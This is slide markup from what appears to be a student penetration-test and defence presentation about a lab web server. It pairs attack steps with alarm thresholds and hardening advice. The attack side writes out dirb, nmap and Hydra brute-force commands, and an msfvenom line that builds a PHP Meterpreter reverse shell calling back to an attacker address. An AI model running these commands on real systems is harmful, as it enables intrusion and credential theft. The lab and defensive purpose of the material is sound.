            <a:endParaRPr sz="1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 would recommend setting an alert that is set off any time traffic moves over port 4444 (or any open port).  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Additionally, I would recommend setting another alert that is triggered any time a file with the extension of .php is uploaded to the server.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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t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 recommend an alert be sent once 1000 connections occur in an hour</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1299" name="Google Shape;1299;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548325" y="1604700"/>
            <a:ext cx="4145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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS or firewall can be configured to block the incoming IP addresses of detected port scans.  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>
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creating a whitelist of trusted IP addresses and ensure my firewall security policy prevents all other access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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure that any access to the WebDAV folder is only permitted by users with complex username and passwords.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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limiting the ability to upload files via the file manager/web interface to this specific directory </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="24292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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure only necessary ports are open</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="24292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24292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24292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305" name="Google Shape;130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06" name="Google Shape;1306;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1565425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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It would be beneficial to set an alert to monitor directory file or folder request across HTTP / port 80.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The alarm will activate any time the specified folder is being requested across HTTP / port 80.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307" name="Google Shape;1307;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4561525" y="1413350"/>
            <a:ext cx="41811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Create User permissions restricting access to specific directories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Limiting access to local area network only.  No access to files outside the intranet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Enable Require all denied in the filesystem directory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Turn off all aliases that refer to file directories in conjunction with HTTP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Move to  &lt;Directory /&gt;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Run </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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Require all denied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13" name="Google Shape;1313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14" name="Google Shape;1314;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="45990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An alarm could be triggered for a set number of HTTP-GET requests. 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Also, setting an alarm when the User-Agent includes the term “Hydra.”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alarm?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5 HTTP-GET requests from the same ip address to the same resource that generates a 401 status code. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315" name="Google Shape;1315;p1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Implement account lockout after 5 failed attempts accessing the web server.</a:t>
            </a:r>
            <a:endParaRPr b="1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b="1" lang="en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Only allow ssh-key pair authentication from trusted machines on the backend for administration.</a:t>
            </a:r>
            <a:endParaRPr b="1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321" name="Google Shape;1321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22" name="Google Shape;1322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An alarm trigger to be set when this directory is accessed.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Every instance outside of normal working hours an by non-authorized users.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323" name="Google Shape;1323;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="42984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Update servers configuration file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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limiting connections to this shared folder, so that it is not accessible from the web interface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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensuring connections to this shared folder are restricted by a machine with a firewall rule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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensuring that the firewall detects and cuts off the scan attempt in real time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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensuring that the firewall is regularly patched to minimize new zero-day attacks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29" name="Google Shape;1329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30" name="Google Shape;1330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What kind of alarm can be set to detect future file uploads?</a:t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Alarm should be configured to monitor file upload requests to specific folders located on the WebDAV server.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What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr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The threshold should send an alarm anytime a file upload for a specified folder is requested.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331" name="Google Shape;1331;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445355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What configuration can be set on the host to block file uploads?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Only specific file types can be uploaded to limit the uploading of executables and shell scripts.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Only authenticated users (two factor) can upload files.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Only use simple error codes that do not expose directory structure on a failed upload attempt.</a:t>
            </a:r>
            <a:endParaRPr b="1"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Upgrade to Apache Server Version 2.4.51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3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883525" y="910475"/>
            <a:ext cx="21369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18.04.1 LTS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server1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 GNU /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 Pro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ML-RefVm-684427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0" name="Google Shape;106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950" y="681525"/>
            <a:ext cx="4812075" cy="41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{20B96FAF-E575-4579-8DD4-3BD0F1172A7B}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 / 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testing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/ SIEM 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Collections / Report Generation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VM / Gateway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 / 10.0.0.4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 / Project Host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 Linux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 / Pentest Server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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="572188"/>
            <a:ext cx="9144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3" name="Google Shape;1083;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="446825" y="94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{20B96FAF-E575-4579-8DD4-3BD0F1172A7B}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66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HTTP Server CVE-2021-41773 Exploited in the Wild (port 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open for scans)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EB575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dirb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="EB5757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000" u="sng" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="EB575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http://192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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lang="en" sz="950" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="EB5757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192.168.1.105/company _folders/secret_folder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en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team was able to find two hidden directories.  From there login files with exact instructions to the VSI server were found in plaintext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Numerous open ports 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(lack of principle of least privileges)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EB575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-sT -sV 192.168.1.0/24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Discovery of vulnerable ports that could be exploited, as well as a hidden server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(password cracking)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EB575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-l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /usr/share/dirb/wordlists/common.txt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Gained direct access to an employees login credentials and in addition we gained the CEO’s password hash giving us access to their account as well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 open access to company server directories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rgbClr val="EB5757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dav://192.168.1.105/webdav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Permission to write and upload files, including malicious payloads to the company’s server.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HTTP Server CVE-2021-41773 Exploited in the Wild (port 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open for scans)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en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(Meterpreter Reverse TCP Host Connection)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Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="950" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="EB5757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Msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=80 &gt;&gt; shell.php</a:t>
                      </a:r>
                      <a:endParaRPr sz="950" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="EB5757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vulnerability can be used for remote code execution when mod_cgi is enabled. With mod_cgi enabled, an attacker can execute arbitrary programs via HTTP POST requests.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Exploitation: Apache HTTP Server CVE-2021-41773 Exploited in the Wild</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089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0" name="Google Shape;1090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8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command dirb was used from the Kali server to search for any open directories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2" name="Google Shape;1092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3" name="Google Shape;109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4" name="Google Shape;109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5" name="Google Shape;1095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found the following open directories which we could then navigate and get into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http://192.168.1.105/server-status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http://192.168.1.105/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0" name="Google Shape;1100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1" name="Google Shape;1101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3" name="Google Shape;1103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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429675" y="148132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EB5757"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>dirb http://192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="EB575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2a2e5628fa_1_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Exploitation: Apache HTTP Server CVE-2021-41773 Exploited in the Wild </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cont.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;g12a2e5628fa_1_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Image</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;g12a2e5628fa_1_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g12a2e5628fa_1_0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Scanned for hidden directories using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> command. Found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/server-status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EB5757"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/webdav</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EB5757"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1113" name="Google Shape;1113;g12a2e5628f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125" y="1803075"/>
            <a:ext cx="4277050" cy="2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